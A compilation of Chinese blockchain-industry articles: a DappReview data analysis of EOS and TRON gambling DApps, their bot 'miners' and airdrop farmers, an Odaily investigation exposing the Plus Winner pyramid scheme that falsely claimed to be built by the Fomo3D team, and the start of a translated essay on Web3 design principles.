第二大户相对分散一些,BetDice、EOSBet、EOSMax、Big.Game、ToBet雨露均沾,该大户的交易量非常惊人,15天内刷出了263万笔交易,要知道11月所有Dapps总交易笔数也就1亿左右。 

1.2 – Dapp活跃用户和矿工

在上一篇文章《80天80亿,寒冬下的暗流涌动——你所不了解的EOS DApp生态大爆发》中,我们介绍了BC类游戏的玩法逻辑 —— 

Dapp中会发行自己的代币,该代币根据每一局游戏中玩家花费的金额分发给玩家(玩游戏即挖矿),同时有减半机制,在特定时间周期之后,玩游戏获得的代币数量会减半。

Dapp开发团队定期将部分利润分红给所有持币人。对持币人来说,即便玩BC类游戏的数学期望为负,但是可以通过积攒代币吃分红,以及代币上交易所后抛售来弥补BC游戏中的亏损,实现整体盈利。

在这个盘子中也存在矿工,即所谓的“Dapp矿工”,指利用工具进行高频游戏而获得大量游戏代币的人群。 

下面我们来看看每个Dapp究竟有多少活跃用户和矿工。 我们按照以下规则定义:

活跃用户定义:11月与合约发生交互次数 > 30次

矿工定义:11月与单个Dapp合约交互超过5000次 

这是本文中最重要的一张图表,请多花几分钟仔细读一下。 

几个结论: 

1. 绝大多数EOS Dapp的11月有效活跃用户数不超过2000,那些总用户超过1万的Dapp其大量的用户主要分成两种:一部分是羊毛党(部分Dapp有免费投注等活动,被盯上批量薅羊毛);另一部分是刷单用户 。

2. 矿工贡献了BC类游戏70-90%以上的交易量,而矿工总数约1400个地址左右。可以理解为这1400个地址占据了整个EOS Dapp 3.5亿流水中的绝大部分。 

3. 唯一的真正游戏——EOS Knight,是EOS Dapps中的一股清流,66%为活跃用户,用户数和活跃占比都是第一,游戏的机制也不存在矿工的概念,可以说是EOS上真正的头部游戏类Dapp。 

以上就是用户层面的最真实的信息,在惊人的交易量背后,是一副由矿工构建起来的虚假繁荣。对于矿工来说,信仰不重要,赚币(赚钱)是王道。 

常见的套路有:

矿工大户冲进某个游戏开启了“核能”矿机,一众散户看到天量分红之后纷纷入场,有的开始挖矿,有的二级市场收货质押等着吃分红,游戏热度在各个群里持续提高,二级市场价格随着参与者进入不断被拉高,而此时大户开始“套利”,即拿出低廉的挖矿成本挖到的代币,用更高的价格在二级市场抛售,甚至直接砸盘。一旦大户砸盘离场之后,分红断崖下跌,二级市场价格雪崩,如果游戏本身在运营上和内容上撑不住的话,基本就废了。 

在某种程度上,矿工有能力套住一批散户,同时加速一个Dapp的生命周期。当然,打铁还需自身硬,能不能扛得住矿工的压力,在挖矿减半时或者矿工离场时软着陆,要看Dapp本身的能力。

对于优秀的团队和产品,用户愿意买单,矿工离场意愿相对较低,即使离场也会相对温和。之前的一款游戏Royal Online Vegas(以下简称ROV)第一次减半时,很多人等着大户砸盘来低价收货,而实际上竟然没有人砸盘。本质上是因为大部分用户(包括矿工)对于ROV的团队的认可以及未来路线图的看好,记得有一次某大户一次100w砸盘把二级市场价格砸到几乎腰斩,第二天价格就被买盘拉回原位。 

矿工,就如同网游中的打金工作室,以技术手段用低成本获取游戏中的资产,在二级市场上套利获益,他们的存在是一把双刃剑,可以高效盘活游戏内的经济逻辑和效率,也能够以最快的方式对游戏造成毁灭性打击。 

1.3 – Dapp羊毛党

说完矿工,来看看羊毛党们的神级骚操作。EOS上的15.7万账户里,有12万不活跃的账户,这其中有大量的羊毛党存在,举2个典型的例子 (下面列出了部分羊毛地址)

仅pralijing123和z.io这两位羊毛大户就手持1.2万个羊毛地址,他们薅羊毛各有各的偏好,先来看看pralijing123同学,他非常喜欢薅ROV的羊毛,ROV有一个小福利就是第一次投注1EOS能获取50MEV(ROV的代币),在此之后每投注1EOS仅有1.5MEV左右(挖矿难度一直在提高),利用这一点,pralijing123用自己的海量地址去玩第一次投注赚取大量MEV代币,以下是几个汇总账户。

不难看出,这位兄弟是一个武侠爱好者,其羊毛账号有郭襄系列、小昭系列、乔峰系列、林月如系列等等,单从以上这几个小号看,他就已经赚取了超过1.7万MEV和300+EOS的羊毛,其他还有大量账号这里就不做展开了。

另外一位z.io更喜欢BetDice每天一次的免费抽奖机会

有趣的是他所有的收益都汇总到一个账号叫lueosyangmao (撸EOS羊毛),简直不能更直白了……该账号在11月27号把羊毛账号的收益汇总了一次——总计1063 EOS,打入自己的lolfund12345账号。

矿工和羊毛党,一个占到70%+的交易量,一个占到了70%+的用户量,但如果你认可“代码即法律”,那他们的存在即合理。

2     Dapp赚不赚钱? 

大量开发者看到了海量交易额和暴富故事,便all in其中,企图分一杯羹,但这钱真的好赚么? 

我们用数据来说话。 

为了统一计算数字,几个基本假设: 

  1. 庄家优势(House Edge) = 2%
  2. 考虑50%交易量使用了0.2%的推荐链接,庄家收益 = 总流水 * (2%-0.1%)
  3. 70%收益分红,10%收益用来CPU租赁/市值管理等,20%归项目方,项目方收入 = 庄家收益 * 20%
  4. EOS价格按照 13元

注:为简化计算,以下头部Dapp均按照上述假设中统一参数计算,实际上不同Dapp的House Edge在1.5-4%之间,分红比例也在60-80%不等。所以以下数据仅供参考,并不能够准确的代表实际情况。 

按照上述的粗略假设可以看到,第10名开外的Dapp在11月所赚的EOS,按照12月15日的价格计算还不足20万人民币,这点收入不太可能覆盖开发团队的人力、运营广告等费用。当然项目方还有其他的收入:一部分来自于团队解锁的部分代币收到的分红,另一部分也可以在二级市场上出售部分代币套现。但往往良心的团队很少出售套现,反而会选择托盘。 

仅有极少数头部Dapp赚到了钱。Dapp开发者一方面加足马力开发面对日益激烈的存量竞争,另一方面还要提心吊胆地担心黑客入侵,损失的EOS动辄数以万计。此外还可能要面临散户维权的压力,着实不易。 

不仅EOS,波场上的Dapp同样存在二八效应,头部项目TRONbet一骑绝尘,最近几天不断刷新纪录,单日突破了14亿波场的交易额(12月15日),单日分红突破200万人民币,按此计算,项目方单日收入在50-60万人民币之间。 

3     Dapp的发展历程 

无论出发点是什么,最近古典币圈确实普遍认为Dapp将要爆发。但目前的Dapp尚不足以被称为“真•风口”,它仅仅是由投机者堆积的假象而已。

作为行业内最早的观察者和评论机构,DappReview认为:目前仅有的爆款,只有去年12月份撬动一池春水的CryptoKitties(加密猫)。 对于缺乏活水的区块链行业而言,评判爆款的唯一衡量标准是它能够带来了多少圈外的增量用户。

7月份“大火”的Fomo3D,第一轮总计参与用户不超过3万,而EOS Dapp核心用户仅有将近4万,可以断定玩家主要是存量持币用户。加密猫总计拥有超过20万ETH的地址与合约交互,这其中有大量新创建的地址。

还记得当时我在朋友圈晒了拥有的猫咪后,许多完全不了解加密货币的朋友来咨询怎么买,并跨越了钱包(Metamask)、交易所这些高门槛成为了持币者,并购买了自己的第一只加密猫。 

4-6月是今年Dapp最火的时期,盛况远超当下。当时国内的三大游戏引擎Cocos、白鹭、Laya高调进军区块链,国外厂商Loom、Enjin频繁曝光新产品,一时间百舸争流。当时,链游行业会议的参与者不乏主流游戏CP(内容生产商),现在的Dapp大会参与者反而多为钱包、媒体、玩家和行业上下游,有点自己给自己打气的悲凉味道。 

5月份的Cocos开发者沙龙上海站

今年5月底Cocos上海开发者沙龙上,王哲(Cocos创始人)跟我说,“别看现在这些区块链游戏开发团队都很积极,80%最后都会消失”。不过半年,预言就成真了。第一批Dapp开发者基本都离场了,还有一小部分在坚持,但也是“下海”到EOS和TRON的BC类游戏,试图赚一些现金流。

见证了整个过程的我其实内心五味杂陈,眼看他楼起了,当时我见了太多兴奋地开发者,我们讨论是怎么结合区块链更好玩、为什么要上链、技术上哪些要解决。可最近,我却持续收到了不少开发者这样的微信:

“已经没有信仰了”

“没有用户,真的赚不到钱”

“考虑回去做手游出海了” 

诸如此类。 

我们姑且把这些匆匆入场、匆匆离场的人称为“经典Dapp圈”(不用古典了,毕竟在我们这那是骂人的)。微信群中“新Dapp圈”的家人们(家人:指一起玩BC类游戏的同伴们),聊天的内容基本围绕着哪个项目现在适合挖矿,挖矿成本多少,哪个项目分红多,什么时候挖矿减半。 

围城内外,老韭菜们隐隐担忧这样的玩法不可持续,又一次“新Dapp圈”的部分资深家人们对Dapp的形态开始自我怀疑,这样的玩法还能持续多久?下一波真正的Dapp究竟以什么形式出现?

在游戏类Dapp真正的爆发之路上依旧有很多瓶颈:

1.公链性能 – ETH的tps,EOS的cpu等机制 

2.用户门槛 – 钱包上手、ETH的交易费、EOS的RAM等机制 

3.优秀内容 – 有创意的人生产有价值的内容

而这里面,第一点性能是最不重要的,游戏本身不吃性能,有了高性能的公链也不代表就会有优质的游戏,游戏的核心是在某一个点上做到有意思、好玩,就够了,每天都会出现大量的手机游戏、PC游戏,只有非常少数需要用到最新的硬件和技术,绝大多数用几年前的电脑照样可以玩,游戏性的核心在于玩法而非性能。

而且即使站在区块链相对理想化的角度,游戏的逻辑也不需要全部上链,也就是对基础设施不会造成那么大的负荷。核心机制上链就足够了,如涉及到资产、安全性、公平性的逻辑和内容。基础设施和应用的发展是一个互相促进的作用,而不是在今天就有人能预见——5年后承载一个DAU 1亿的游戏类dapp需要什么样的基础链,以及现在就能去实现。

最大的挑战是后面的两点,用户上手的门槛太高和优质内容的缺乏导致整个生态中的用户非常少,依旧是存量持币用户为主,很难吸引到圈外的主流游戏玩家进场。

区块链之于游戏,只是多了一个我们可以使用的技术和工具,而并不是说过去的游戏就要完蛋了或者全部被颠覆,主机游戏从上世纪60年代诞生,时至今日依旧竞争激烈、大作频出,Steam作为端游的分发巨头根本不需要上市和外部资金支持,桌游这种圈外人看起来很古老、小众的游戏其实早已是一个百亿的市场且还在不断增长。

“区块链游戏”这个名词甚至都是一个伪概念,只是在行业初期,我们用来泛指所有使用了区块链技术的游戏。在最后,这些游戏还是要落地在不同的平台之上。

所以,说区块链能颠覆整个游戏行业?我是不信的,区块链可以改造开发商与玩家之间的协作关系,可以通过引入通证经济和资产代币化增加游戏的经济属性和激励机制,可以让玩家现拥有一个现实世界中实体物品一样的拥有游戏中的虚拟资产(这一点我会后续用单独一篇文章讨论),这些是革新,是优化,不是举着一片大旗否定所有传统游戏。 

最终的状态下,对于大部分玩家来说,区块链植入游戏的体验应该是无感的,游戏只要好玩就可以,至于用没用区块链,这不重要。

4     EOS Dapp新玩家:波场 

除了EOS之外,由孙宇晨主导的公链波场(TRON)也是一条聚焦Dapp赛道的公链。

关于这两条链,有个很有意思的现象:由西方人BM开发的EOS的用户主要在中国和韩国,亚洲地区为主,而中国人孙宇晨开发的TRON的用户却受到了海外市场的欢迎。

这可以理解为,本土产品不受本土市场的待见,这事实上是一种偏见。他们的崛起都有其道理,现阶段开发者最迫切的需要只有两点:一是用户,二是资金支持(或能不能赚到钱)。

相比曾经含着金钥匙的几条国产大链的碌碌无为,波场在这两点上面确实夯实了基础工作。

对用户真实性有质疑的,可以去头部游戏TRONbet的telegram群看一下,至少不输于EOS头部Dapp的活跃程度。

在最近跟开发者的接触中,了解到波场已经默默的接触了大量国内外的Dapp开发者和主流游戏CP,希望引入更多多元化的内容,而非BC类独大。目前正在进行的Dapp大赛(http://www.tronaccelerator.io/)和波场成立的1亿美金区块链游戏基金正蓄势待发。

DappReview对于任何公链不站队,更倾向于公链用Dapp的数据和内容的丰富性来证明自己。我们从10月底开始关注到TRON上的第一个Dapp,并第一个完成对于TRON Dapp的数据支持,比DappRadar早了近一个月。 通过持续跟踪及观察,虽然我们无法断定波场一定会成功,但至少横向对比其他的空气链可以判断波场在干活。

而在整个区块链行业,即便人人高喊“熊市干活”,可做好本分工作依然一项稀缺品质。

5    古典币圈怎么进入Dapp圈 

5.1 – 认知层面

DappReview几篇文章 

《浅谈你们根本不懂的区块链游戏》

—— 5月份对于区块链游戏的一些思考,很开心地看到当时的不少观点有越来越多的开发者正在落地探索中 。

《2018年区块链游戏产业白皮书 – 新的市场 新的机遇》

——在ChinaJoy上发布的2018年区块链游戏白皮书,主要是针对上半年ETH上Dapp的总结

《80天80亿,寒冬下的暗流涌动——你所不了解的EOS DApp生态大爆发》

——8-10月这段时间EOS生态的爆发全解析 

5.2 – 数据工具 

DappReview网站(https://dapp.review,提供ETH/EOS/TRON等主链上全部Dapp的数据分析,后续我们将支持更多拥有Dapp的主链。

氪金排行榜 

https://player.dapp.review 

每天查看持币大户玩Dapp的情况,同时也可以当做自己的一个小账单,搜索自己的地址可以查看玩了哪些Dapp以及花费多少代币。

5.3 – 钱包

很多币圈的用户持有EOS却没有EOS钱包和自己的账户,大部分币都放在中心化交易所,包括不少我认识的Token Fund投资人甚至都不知道怎么使用EOS钱包。 

支持EOS Dapp的钱包 :

本图素材取自比特派Dapp生态链一览图

除了图上钱包之外,还有BitPortal、EosToken等也都是支持EOS Dapp的钱包。

值得一提的是比特派做了些很有意思的尝试,做了EOS 跨链稳定币的尝试。持有主流区块链资产BTC、ETH、USDT的用户可以通过跨链网关把资产兑换为EOS网络上同等数量的跨链资产,用户可以在支持的 DApp 或去中心化交易所中使用这些资产。本质上是希望将持有BTC、ETH、USDT的用户可以引导来玩EOS的Dapp,还不用担心EOS价格的波动。

支持TRON Dapp的钱包,目前主要有Cobo钱包和麦子钱包。

5.4 – 去中心化交易所

在Dapp的世界里请忘记中心化交易所吧。

中心化交易所类似于现有金融体系中的券商,是通过交易获取alpha的场景,也就是炒币。

DEX(去中心化交易所)的存在更像是一个提供换汇服务的场景,我们在DEX的使用逻辑是需要用主流币换取Dapp代币去玩游戏或者质押那分红,或者把游戏代币套现成主流币,用来做二级炒币的需求更低。

目前主流的EOS DEX有:

本图素材取自比特派Dapp生态链一览图

DApp开发乱象:假冒Fomo3D技术团队,数十家媒体拉人头

熊市之下,币圈低迷,DApp 开发的世界则乱象丛生。

“那就是一个假的诈骗网站。”听到 Plus Winner 由 Fomo3D 技术团队研发,Fomo3D 成员给 Odaily星球日报的第一反应是,假的。

12 月 10 日晚,一个自称是“原 Fomo 3D 技术团队研发的新款智能合约游戏” Plus Winner 横空出世。

这是一个基于以太坊开发的游戏类 DApp,据 Odaily星球日报调查发现,其游戏规则和资金盘、传销盘无二,分为静态收益和动态收益,前者即分红,后者则是通过“拉人头”获取。

近日,Odaily星球日报联系到 Plus Winner 的背后推手,问及数日前黑客攻击导致投资者受损,对方却称,那只是团队的一个“幌子”,背后是一个“主动升级的策略”。

假冒知名开发团队、假装被黑客攻击、请数十家媒体为其站台、拉人头、变相传销……Plus Winner 背后谜团重重。

而在揭开 Plus Winner 背后真相的同时,Odaily星球日报还发现,熊市之下,币圈低迷,DApp 开发的世界则乱象丛生。

假冒 Fomo3D 团队

“熊市送温暖……投资 0.1~10ETH 即可躺着赚钱。”12 月 8 日,玩家安妮(化名)在朋友圈写道,附图为一张入群二维码,群名叫“ Plus winner 爆破矿工首发”。

Plus Winner 是一个新款智能合约游戏,“以投放‘炸弹’方式开采量子石基金矿池,来获得多项收益”。

游戏规则简单,玩家充值以太坊购买炸弹,一个炸弹等于 0.1 个ETH,最多购买 100 个。

然后倒计时 24 小时,玩家每购买一个炸弹,引爆时间增加 30 秒,每位玩家购买子弹费用的 5% 将自动转入量子石基金矿池。矿池奖金为引爆前最后一名玩家所得。

该玩法和半年前火爆的资金盘游戏 Fomo3D 类似,Fomo3D 刚出生时,以倒计时和分红奖励为噱头,被业内称为著名的资金盘游戏。

在 Plus winner 一份由诸多玩家统一传播的推介语上,其的确写着,该游戏由原 Fomo3D 技术团队研发。

Odaily星球日报记者曾登录 Plus Winner 官网,其 UI 页面简陋、配色和排版十分混乱,让人很难相信其跟成熟的 Fomo3D 出自同一开发团队之手。

Dappreview 创始人牛凤轩向 Odaily星球日报称,这个游戏不可能是 Fomo3D 团队开发的,因为 Fomo3D 团队应该不是中国人。他曾在聊天软件 Discord 上和 Fomo3D 团队沟通,对方聊天的方式和发布的中文内容“一看就是谷歌翻译的”。

但在 Plus Winner 官网的新人指引视频里,是一位操着湖南口音的男子在讲解“如何在火币交易所购买 ETH”。

12月15日,Odaily星球日报曾向 Fomo3D 团队求证此事,对方直接回应:“这是一个假的诈骗网站,几乎所有的山寨网站都宣称他们是 Fomo3D 技术团队开发的,但我们开发人员只有3个。”

砸钱“拉人头”

一个假冒 Fomo3D 团队的游戏,上线却被推广得颇为火热。

据其团队公告,这款游戏甫一上线“注册量与交易量远超同类其他任何游戏”,上线 1 小时内“平台充值量已超过 2000 多枚 ETH,注册玩家 3000 多个”。

熊市之下,这份数据让人惊叹。据 Dappreview,12 月 13 日以太坊上日活最高的游戏是 My Crypto Heroes,其24小时交易额为0,7天交易额也仅为 178 ETH,完全不敌 Plus Winner。

就在 Plus Winner 顶冒着原 Fomo3D 技术团队的光环招揽财富时,却有三十余家币圈媒体为其发布快讯,营造声势。

币圈媒体运营胡初(化名)向 Odaily星球日报透露,12 月 11 日晚,在一个 30 余人的币圈媒体群里,一个叫做“plus winner 小秘书”的人动辄发送百元以上的红包,“一晚上发了几百个包”。

紧接着,12 日 12 日中午,链一财经、万链之家等数十家币圈媒体还为 Plus Winner 重启发布快讯。快讯简单统一,称 Plus Winner 恢复数据后再次冲高,游戏流水5600 ETH,奖池已经达到 280 ETH,约合 20 万元。

此外,在 Plus Winner 的推广社群里,流传着这样一个视频,视频显示 12 月 12 日,链一财经、币桃、币小白、万链之家等三十余位币圈媒体相关人士同时发布了 Plus Winner 的快讯截图及拉新链接。

胡初将这种行为叫做“炸群”。项目方让媒体统一时间发布相同推广内容,以此在朋友圈形成蔚为壮观的刷屏现象,这被叫做“开车”。结束后,媒体凭借发布内容的截图向项目方锁取”车费”。

事实上,除了项目方红包奖励外,这些币圈媒体人士还拥有游戏的额外奖励。按照 Plus Winner 的拉新规则,上述人士将至少拥有被邀请者充值额 10% 的奖励。所以这些人大多建立了自己的拉新社群。

不过,就在被拉进群的投资者们热闹地投入资金参与到 Plus Winner 这款游戏中时,12 月 10 日深夜,Plus Winner 突然出现故障。在一次宕机后,游戏官网陷入崩溃,而游戏玩家们的资金则不知去向。

次日中午,团队公告称故障源于黑客攻击,游戏已于当日下午两点重启。

之后,支持 Plus Winner 的币圈媒体还跟他们“闹掰了”。

“这个项目谁做的,这么弱智,这么低能,不是一手项目么,把媒体当傻子玩么,是不是把媒体都当傻子?”12 月 13 日晚上 7 点,币圈媒体从业者白菜(化名)在一个群里控诉。

一个名为“币圈美少女”的人还发布文章《黑心项目方 PLUSWINNER 10 元羞辱遭币圈媒体联合封杀 项目方已跑路》,内容显示,Plus Winner 一开始联系近百家媒体为其发声,而后“项目方因己之过,遭微信屏蔽,借口拒结宣发,引发众怒,遭到币圈媒体联合封杀”。

胡初称,Plus Winner 本来承诺给其 50 元,结果只给了 10 元,他找“plus winner 小秘书”理论了几句,结果被其拉黑。

“我不要币了,拜拜。”胡初最后退出了自己发起的“打新”群。

典型的传销游戏

Plus Winner 的幕后玩家之一是一名叫做卢国军的人。

卢国军的朋友圈里充斥着藻相许、NK 细胞、醉苗香等传统生物传销项目,也有幸运赛车博彩网这类博彩网,此外还有 Vpay、宠物马等区块链新型游戏模式。而这些都是他的客户。

卢朋友圈还显示,其先后参与过电商、O2O、AI、共享概念、小程序等软件开发,一个曾经火爆的“风口”也没错过。

今年 2 月,卢开始接触区块链。“区块链、密码学、去中心化、分布式账本、公式(共识)机制、双花、分叉、智能合约、哈希值、Token,词穷先谈谈这些先”,他曾在朋友圈写道。

“区块链搞起,像前海填海填到大厦耸立。”卢国军曾写。两个月后,他就开发出一款区块链宠物马养成游戏。

12 月 15 日,Odaily星球日报联系到卢国军,他表示,Plus Winner 由他们团队自己开发运营,而声称遭受黑客攻击,是为了掩盖系统存在安全问题的幌子,背后是主动升级的策略。

“我们比 Fomo3D 模式更加好。”他颇为自得地说。

事实上,比起 Fomo3D,Plus Winner 的推广运营模式更像传销。和 Fomo3D 系列游戏类同,Plus Winner 玩家邀请好友可获 10% 左右的人头奖励。此外 Plus Winner 还有 20 层的推广奖励和 10 层的轮回奖,和传销活动中的拆分盘极为相似。

DApp开发乱象:假冒Fomo3D技术团队,数十家媒体拉人头

12 月 15 日,卢国军还向 Odaily星球日报介绍,若想与其合作,有两种方式,一是用 50 万元直接购买 Plus Winner 系统;二是免费提供系统给合作方运营,但需抽佣总流水的 3%~5%。

Odaily星球日报还曾在搜索引擎上输入 Plus Winner,在深圳百姓网发现了一条名为“ PlusWinner 区块链系统源码开发”的帖子。

该帖由深圳市鑫世通网络科技有限公司发布,称提供 PlusWinner 区块链系统源码及模式定制服务,报价 1 万元,并表示“此类软件系统(Plus Winner)可以开发”。

相关工商资料显示,深圳市鑫世通网络科技有限公司背后股东是谭平和卢国军。在不同网站,卢国军分别以小龙、卢小龙、卢先生等不同身份示人。

深圳市鑫世通网络科技有限公司其实是一家技术外包公司,其官网显示,该公司提供 Vpay 速通宝、虚拟币交易系统、农场游戏、拆分盘等项目开发服务。

为什么这样一个明显的传销盘,却能获得这么大范围的扩张?

“急于想赚钱回本,因为熊市找到能赚钱的项目不容易。”一位投资者向 Odaily星球日报表示,这位投资者在 3500 元的高点买了ETH,至今“没舍得割肉”,Plus Winner 是他最初觉得为数不多能看到回本可能的项目。

熊市 DApp 开发乱象

眼下,在这个项目方、资本、基金投资纷纷冬眠、缄默少行的熊市,只有资金盘和博彩 DApp 还层出不穷,而它们也正是利用了上述投资者急于赚钱回本的心理。

根据 Odaily星球日报此前所写《区块链与传销不得不说的故事》一文,传销模式的兴起跟俄罗斯 MMM 时代背景均是在国家经济改革前后、货币大幅贬值之时。

“尽管它( Plus Winner )的实质就是典型的资金盘博弈,难登大雅之堂,但它确实从人性的角度,巧妙的满足了人性中与生俱来的贪婪和赌性。尤其这个投资热点不多的熊市里,给投资者提供了一个充满想象力的期待。” Plus Winner 官网如是说。

实际上,Plus Winner 一直漏洞百出,其自上线伊始就 BUG 不断,但还是挡不住人们想要暴富的心理。

12 月 10 日晚上 8 点,Plus Winner 上线三分钟后即出现故障下线,当晚 10 点,游戏再次上线,一小时后再次宕机。

DApp开发乱象:假冒Fomo3D技术团队,数十家媒体拉人头

Plus Winner 团队对故障的解释是遭受攻击后的下线排查。“plus winner 小秘书”告诉胡初,是因为黑客攻击。

不过,DApp 遭遇故障,投资者损失惨重,而“黑客攻击”这个说法似乎已经成了项目方应付投资者们惯用的“挡箭牌”。

据区块链安全公司 PeckShield 数据显示,12 月 14 日清晨 5 点 57 至 8 点 57,黑客采用交易回滚攻击手段,向 EOS 竞猜类游戏 kittyfishing 发起 91 次攻击,获利 558.85 个 EOS。此外,另有两款竞猜类游戏也遭受数十次同类型攻击,损失数百 EOS。

一位业内人士对 Odaily星球日报分析,熊市,黑客攻击的高发时段。因为投资人没有好的投资标的,黑客也失去了其他收入来源,所以攻击比较频繁。

12 月 11 日下午 2 点,Plus Winner 重启,但是数据已被全部清空。

“游戏第一天三分钟就赚回来了,重启后到现在还没回本。”安妮说,“游戏重启了一轮,大家都没玩了。”

截至 12 月 13 日下午 7 点半,Plus Winner 玩家们累计投入 6009 个 ETH,倒计时为 12 小时,而 12 月 14 日下午 1 点半,累计投入值是 6017.1 个 ETH,增加投入 8.1 个 ETH,合算下来,游戏应该已经结束。但游戏却依然进行,倒计时又更改为 20 小时 20 分。

“这游戏肯定是骗钱的,第一批(进入)都没赚钱,设置的游戏时间随意更改。”另一位玩家 Darren 说。

很少有人再为 Plus Winner 投入炸弹,游戏已经进入“垃圾时间”。

而另一边,Fomo3D 创作团队在 12 月 13 日宣布推出新款游戏 ghost3D。

无论是熊市还是牛市,击鼓传花的游戏资金盘游戏永不停息。

如何设计Dapp:Web 3 的设计原则

在这篇文章中,我们不去讨论基础设施的不完善,不去讨论 Sharding 还是 Off-Chain Scaling,我们假设一切都解决之后,下一个问题是什么。

技术发展有三个阶段,技术为王、产品为王和运营为王的阶段,很可惜,区块链目前还处在技术为王的阶段。但在技术问题解决之后,紧随而来的就是产品问题。

基于区块链不同于互联网的特性,我们需要体现基于区块链的应用该有的特性,我们要知道我们发送的交易不可篡改,我们要知道一切都是公开透明,我们要知道,其实每个人都是一个分布在全球各个角落的社区的一份子,在为一个更伟大的目标而努力。

所谓「Dapp」,从不是拍脑袋在前面加上「Decentralized」,它反而在用户体验层面提出了新的要求。

这篇文章的内容很琐碎,也很长。但它会是一篇很好的 Guideline,未来区块链行业的产品经理以及 UI 设计师,都需要读一下这一篇文章。当然,如果你想提前知道未来 Dapp 的样子,也建议你读一读。

中国有很强大的产品经理,我们可以在技术为王的早期,就开始为下一个未来而准备,当它扑面而来的时候,机会总是给有准备的人。

——NPC / Ryan

如何设计Dapp:Web3 设计原则

一个基于区块链的分布式应用的用户体验设计构架

区块链开发者正在试图通过去中心化应用(Dapps)来推进一个去中心化未来的宏大愿景,但是这些应用的用户体验仍旧酷似 web 2 的笨重原型。

更普遍的情况是,大多数使用这些 Dapps 的用户仍然“活在” web2 中,甚至没听说过 Web3 的去中心化的愿景。

即使他们进来看到了这些闪亮的新应用,他们也会很难理解这些应用的术语,用途,动态特性,即使在视觉上也无法将它们与普通的 web 应用程序区分开来。

必须指出的是,有很多让理解这些内容变得更简单的好工具(比如 Drizzle, MetaMask) 正在陆续出现,我们后面也会一一提到。

在本文提出的这些设计原则意图针对这个问题提出一些解决方案,用以指导设计者和开发者们,如此我们就能使那个光明的未来对所有人变得不那么遥不可及。

Web3设计vs区块链设计

有人曾撰写了“区块链设计”[1],也展示了与去中心化应用 (Dapps) 的前端用户体验相关的解决方案。

尽管 Consensys 的首席设计师 Sarah Mills 的文章读来很有启发性,而且她显然已经是区块链领域设计者中的意见领袖,但我依然认为“区块链设计”这个措辞更适合用于定义区块链构建本身的属性和交互作用:比如共识算法、底层架构、区块奖励、图灵完备性、算力或“gas”的成本、链上或链下的治理机制等等等等。

在这篇文章中我会改为使用 “Web3 设计”,主要是指应用在面向用户部分的去中心化应用的设计

把“区块链”放在标题里很有诱惑力,但那就是标题党了😉

为什么是Web3设计原则?

今天,用户可以通过多种方式与部署在区块链上的智能合同进行交互: 要么直接写命令行,要么通过数字钱包或 Dapp 浏览器界面,或者通过智能合约开发者已经开发完成或将要开发的更丰富的前端界面。

显然,更好的推进 Dapps 广泛应用的方式是后者 : 提供一个丰富的用户界面来整合基于区块链的分布式应用程序的使用体验。

作为开发者,我们今天正义无反顾地忙于构建区块链基础设施以及我们自己项目的智能合约,目前显然没有多少 Dapps 有一个好用的前端,或者即使他们有,只是体现在内容的安全上面,他们看起来通常和其他的同类 web 应用没什么区别

而事实上,Dapps 与普通的 web 或移动应用有着本质的区别,因为它们基于、而且强烈的传达着区块链所赋予的强大特性: 去中心化、透明性、去信任化、不可改变、抗审查特性等。

这些设计原则编纂成的可用工具应该拥有区块链的这些特性,并且在 Dapps 的前端就反映出来。

目标应该是这样的:一旦正确应用这些原则,用户在登陆 Dapp 的时候就可以立即知道她正在使用的是一个 Dapp ,更重要的是,她已经在享用区块链的强大功能,因此也知道她可以完全信任与这个应用程序的每一次互动

理解这些原则需要考虑的变量

  • 我们心目中的主要目标是非技术用户,尽管有些原则适用于更懂行的用户
  • 并不是所有的 Dapps 都要适配所有原则
  • 这些案例中所展示的解决方案只是一些初步想法
  • 一些原则可以被不同 Dapp 开发者使用不同方式实现
  • 有些web3原则推荐外部工具、服务或程序库,而不是想象每个开发人员都会实现他们自己的解决方案(更详细的步骤我下面会说到)
  • 大多数(如果不是全部) web3 设计原则都将会从开发者友好库这样的编程引导程序中受益(更多请往下面看)

设计方法

设计也同样是关于预测问题并解决问题的。这种情况下,我试着“预测”(在我看来这个词更好,因为它的词源意义是“向前发展”到未来)用户在与 Dapp 交互时可能会遇到的问题。

比如:

  • 这样做安全吗 (Dapp 要求我去做的操作)?
  • 如果我搞砸了那我的钱会有风险吗?
  • 我听说加密信息应该更私密一些,那我发送的数据会有什么变化?它会被存储在哪里?我会因此被识别出来吗?
  • 谁会看到我输入的数据?系统的代码会在哪里运行?
  • 我做了这个(举动)之后会发生什么?
  • 我应该怎么做(这里要加密吗)?
  • 这 (奇怪的加密单词) 是什么意思?
  • 假设区块链是可信的,那我怎么能够知道这个 app 上的哪些数据是可信的?
  • 哪些数据是来自区块链的?
  • 如何验证数据确实是存在区块链中?
  • 等等

本文提出的设计原则会为开发者提供能够解答上面这些问题的工具,并在用户有更多问题的时候能够提供一些思路。

Web 3设计原则(索引/备忘录)

(这篇文章很长,所以你可以用这篇备忘录快速浏览一下这些原则,然后跳到你更感兴趣的那部分。)

///TTT(Trust Through Transparency Design Principles): 通过透明设计原则的信任

1——(读取数据)数据来源的透明度

➤ 🌀 明确哪些数据来自区块链,哪些不是

➤ 🌀 明确合约的地址

➤ 🌀 将所有区块链数据连接到独立的区块链浏览器

➤ 🌀 明确哪些数据来自数据库 (∞>章节:5.代码的透明度)

— 怎么做 >的示例

2——(写入数据)交易的透明度

-交易类型(价值转移,函数调用,合约生成)

➤ 🌀 [不可篡改] 明确操作是不能够篡改的

➤ 🌀 [价值] 明确操作涉及金钱或价值

➤ 🌀 [隐私性] 明确可能会需要用户验证的操作

➤ 🌀 [工厂] 明确哪些操作会以用户的名字产生新的合约

– 所有交易的准则:

— ➤ 🌀 明确并提前确认新的未来状态

— ➤ 🌀 以大家可读的格式和智能合约要求的方式显示正在用于交易的数据 (∞>章节:5.代码的透明度)

— ➤ 🌀 明确Gas价格的建议值以及如何覆盖掉 Tx (∞>章节:9.Gas价格和交易撤销)

— ➤ 🌀 管理交易等待的时间 (∞>章节: 6.时间/等候管理)

— ➤ 🌀 尽可能的,明确什么操作不是交易,以此确保安全

— 怎么做 >的示例

3——(推送数据)智能合约事件的透明度

➤ 🌀 明确并让终端用户可以访问所有事件,即使它们只用做开发者用途

➤ 🌀 应用相关性:只显示与当前用户相关信息的通知信息

➤ 🌀 允许用户订阅,取消订阅或暂停一项事件,或者静音这项事件的通知。

— 怎么做 >的示例

4——(历史)用户交互历史的透明度和可访问性

➤ 🌀 提供给定地址的所有交易的历史记录

